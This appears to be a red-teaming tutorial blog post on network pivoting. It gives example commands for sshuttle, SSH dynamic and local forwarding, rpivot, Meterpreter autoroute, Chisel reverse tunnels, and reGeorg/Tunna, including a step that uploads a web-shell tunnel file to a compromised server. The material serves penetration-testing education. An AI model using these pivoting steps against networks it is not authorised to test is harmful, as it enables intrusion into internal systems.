Tunneling and port forwarding tools used during red teaming assessments
Security experts traverse network boundaries to access internal infrastructures and sensitive information even over the most protected and secure environments. With tunneling and port-forwarding methods, a pivot machine inside the internal network can be used as a bounce machine to connect with other unrouted networks, critical devices, active directory assets, including the AD controller, and all the perimeter.
Most Popular Tools
Sshuttle
Sshuttle is a transparent proxy server over ssh that works as a simple VPN. It doesn’t require admin access ad forwards the traffic over SSH protocol. This tool also supports DNS tunneling when TCP communication is blocked by default.
FREE role-guided training plans
To transfer traffic to 10.10.10.0/24 via the pivot, we can use the following command:
sshuttle -r ptavares@192.168.2.105 10.10.10.0/24After that, sshuttle will create the iptables rules, and the communication can be done by using a command like this:
curl --head http://10.10.10.2URL: https://github.com/sshuttle/sshuttle
SSH Tunneling
Suppose you find a way to communicate with the SSH server installed on the target server, connect with the -D flag. With this parameter in place, the tool will spawn a socks server on the client side.
ssh ptavares@192.168.2.105 -D 1080On the other hand, specifying a single port to forward is also possible using -L fag.
ssh ptavares@192.168.2.105 -L 445:192.168.2.105:445More details can be found here.
Rpivot
Rpivot is a SOCKS proxy based on a pivot tool that works like an SSH dynamic proxy (-D option). However, it works in reverse order.
Server - auditor’s machine
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0Client — target machine
python client.py --server-ip <ip> --server-port 9443The server will create a SOCKS proxy over the port 1080 that will forward all the traffic through the client — the target machine.
This kind of approach can also be used in active directory networks with the following syntax:
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \URL: https://github.com/klsecservices/rpivot
Meterpreter - autoroute
Port forwarding and pivoting can also be done using the meterpreter framework and the powerful tool: proxychains.
To automatically route, use the following:
run autoroute -s 192.168.5.1/24run autoroute -p
use auxiliary/server/socks4a
set SRVPORT 8080
run
proxychains curl http://192.168.5.40
More information about this scenario is here.
URL: https://github.com/rapid7/meterpreter
Chisel
Chisel is a tool that encapsulates a TCP session in an HTTP tunnel while securing it via SSH. In detail, the communication is full-encrypted via SSH, and it supports mutual authentication, automatic reconnection and has its private SOCKS 5 proxy server.
Local port forwarding via Chisel
Pivot machine:
$ chisel server -p 8080 --host 192.168.2.105 -vAuditor’s machine:
$ chisel client -v http://192.168.2.105:8080 127.0.0.1:33333:10.42.42.2:80$ curl --head http://127.0.0.1:33333
Reverse remote port forwarding
Auditor’s machine:
$ chisel server -p 8888 --host 192.168.2.149 --reverse -vPivot machine:
$ chisel client -v http://192.168.2.149:8888 R:127.0.0.1:44444:10.42.42.2:80$ curl --head http://127.0.0.1:44444
A full scenario using Chisel can be found here.
URL: https://github.com/jpillora/chisel
Web-proxies / reGeorg and Tunna
ReGeorg and Tunna are very similar and work with a web shell to create a local SOCKS proxy. This is an excellent way in the most challenging scenarios, for instance, when all the TCP communication, bind services, and outgoing traffic is blocked.
The steps to create the scenario are the following:
- Upload the tunnel file (aspx|ashx|jsp|php) to the target webserver (by using how the server was compromised or accessed).
- Use: reGeorgSocksProxy.py
$ python reGeorgSocksProxy.py -p 8080 -u http://server:8080/tunnel.jspre-Georg: https://github.com/sensepost/reGeorg
Tunna: https://github.com/SECFORCE/Tunna
FREE role-guided training plans
A list of real scenario examples and the effectiveness of various port forwarding and tunneling methods can also be accessed in this article.
Sources:
- A Red Teamer's guide to pivoting, artkond
- SSH pivoting, ired.team
- Pivoting, GitBook - Segurança Informática
In this Series
- Tunneling and port forwarding tools used during red teaming assessments
- Top 10 Linux distro for ethical hacking and penetration testing
- Penetration testing steps: How-to guide on pentesting
- How does automated penetration testing work?
- Intelligence-led pentesting and the evolution of Red Team operations
- Red Teaming: Taking advantage of Certify to attack AD networks
- How ethical hacking and pentesting is changing in 2022
- Ransomware penetration testing: Verifying your ransomware readiness
- Red Teaming: Main tools for wireless penetration tests
- Fundamentals of IoT firmware reverse engineering
- Red Teaming: Top tools and gadgets for physical assessments
- Red teaming: Initial access and foothold
- Top tools for red teaming
- What is penetration testing, anyway?
- Red Teaming: Persistence Techniques
- Red Teaming: Credential dumping techniques
- Top 6 bug bounty programs for cybersecurity professionals
- SigintOS: Signal Intelligence via a single graphical interface
- Top tools for mobile android assessments
- Top tools for mobile iOS assessments
- Red Team: C2 frameworks for pentesting
- Inside 1,602 pentests: Common vulnerabilities, findings and fixes
- Red teaming tutorial: Active directory pentesting approach and tools
- Red Team tutorial: A walkthrough on memory injection techniques
- Python for active defense: Monitoring
- Python for active defense: Network
- Python for active defense: Decoys
- How to write a port scanner in Python in 5 minutes: Example and walkthrough
- Using Python for MITRE ATT&CK and data encrypted for impact
- Explore Python for MITRE ATT&CK exfiltration and non-application layer protocol
- Explore Python for MITRE ATT&CK command-and-control
- Explore Python for MITRE ATT&CK email collection and clipboard data
- Explore Python for MITRE ATT&CK lateral movement and remote services
- Explore Python for MITRE ATT&CK account and directory discovery
- Explore Python for MITRE ATT&CK credential access and network sniffing
- Top 10 security tools for bug bounty hunters
- Kali Linux: Top 5 tools for password attacks
- Kali Linux: Top 5 tools for post exploitation
- Kali Linux: Top 5 tools for database security assessments
- Kali Linux: Top 5 tools for information gathering
- Kali Linux: Top 5 tools for sniffing and spoofing
- Kali Linux: Top 8 tools for wireless attacks
- Kali Linux: Top 5 tools for penetration testing reporting
- Kali Linux overview: 14 uses for digital forensics and pentesting
- Top 19 Kali Linux tools for vulnerability assessments
- Explore Python for MITRE ATT&CK persistence
- Explore Python for MITRE ATT&CK defense evasion
- Explore Python for MITRE ATT&CK privilege escalation
- Explore Python for MITRE ATT&CK initial access
- Top 18 tools for vulnerability exploitation in Kali Linux
- Explore Python for MITRE PRE-ATT&CK, network scanning and Scapy
Get certified and advance your career!
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, ISC2, Cisco, Microsoft and more!
Penetration testing
Top 10 Linux distro for ethical hacking and penetration testing
Penetration testing
Penetration testing
Penetration testing
Intelligence-led pentesting and the evolution of Red Team operations